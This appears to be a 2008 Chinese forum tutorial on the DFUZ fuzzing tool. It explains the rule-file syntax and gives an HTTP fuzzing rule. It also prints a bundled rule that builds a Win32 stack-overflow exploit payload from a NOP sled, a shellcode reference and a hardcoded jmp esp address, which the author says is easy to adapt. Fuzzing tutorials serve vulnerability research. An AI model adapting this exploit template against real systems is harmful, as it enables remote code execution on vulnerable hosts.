文章作者】: condor
【作者邮箱】: cracker@vip.qq.com
【作者主页】: http://hi.baidu.com/linshifei
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
这次介绍比较的简单的一个入门级的工具-DFUZ 。
http://www.genexx.org/dfuz/ 下载地址。
而且有不错的成绩
http://www.genexx.org/dfuz/analysis.html
特点就是数据定义方便,简单易用的。
通过配置文件(*.rule)描述Fuzz数据
配置文件的几个语法有: data(变量), list, 函数,options(选项)
例子:
变量:
var myVar = "Something"
var myVar2 = "String",0x41,|0xdeadbeef|,|0xdeadbeefx5|,|"\x41\x41\x41\x41"x2|,[Bx50],[\x45x6],["Hello"x4],1024,{b040d0b4-b040d0b8- x 1}
var myVar3 = $myVar2
--------------
list:
list some_list:
begin
some_data
some_data
some_data
end
--------------
函数
- %dec2str(num) : Will convert (num) to string and put it. //函数说明
Example: %dec2str(1024) //调用
Result: "1024"
---------------
Options
指定这个配置文件的选项
支持选项有:
- interact: will do select() between the client and server after processing every "peer" command.
- keep_connecting: this will continue the process even if we cannot connect (in a few words: DON'T EXIT).
- big_endian: will make {} formats big endian (little_endian by default)
- little_endian: will make {} formats little endian (default)
- tcp: will make a stream socket
- udp: will make a datagram socket
- client_side: Will connect to a server. (Default)
- server_side: Will be a server waiting for a connection.
- use_stdout: This option will make the socket to be stdout instead of a peer, to use this you need to use "stdout" as the host also.
---------
我们利用以上语法来看一个http协议rules的例子:
例如:
port = 80/tcp
list some_list:
begin
GET
HEAD
End
var get_file = "/index.html"
var content_length = %dec2str(0xffffffff)
peer write: $some_list[rand], $get_file, "HTTP/1.0",0x0d,0x0a
peer write: "Server: www.baidu.com"
peer write: 0x0d,0x0a,"Content-Length: ",$content_length,0x0d,0x0a,0x0d,0x0a
peer read
options = client_side
看完这个,你一定很清楚语法了 -_-
使用也很简单,这样就开始一次fuzz了:
./dfuz 172.16.3.111 ./rules/http.rule v
建议多看些rule文件,你就会很熟悉它的使用了,系统自带的在这个目录
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# ls
dh2.rule foo-exploit.rule fuzz_local.rule msrpc-1.rule shttp_GET.rule win32-xpl.rule
dhcp-bug.rule foo.rule http.rule my-ftp.rule telnet.rule
再看一个例子
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# cat win32-xpl.rule
# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">
var shellcode = $win32_alnum_scode
var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]
var nops_last = [\x90x36]
# jmp esp - windows 2000 sp0
var eip = |77e822ea|
# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4
var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back
port=4000/tcp
peer write: $payload
options=
不是很难吧,改改就可以用了,很容易举一反三
真是是菜鸟入门,探亲访友,装腔作势的必备工具-_-
- 标 题:软件漏洞挖掘Fuzz工具之四-Dfuz
- 作 者:condor
- 时 间:2008-08-05 13:29
- 链 接:http://bbs.pediy.com/showthread.php?t=70045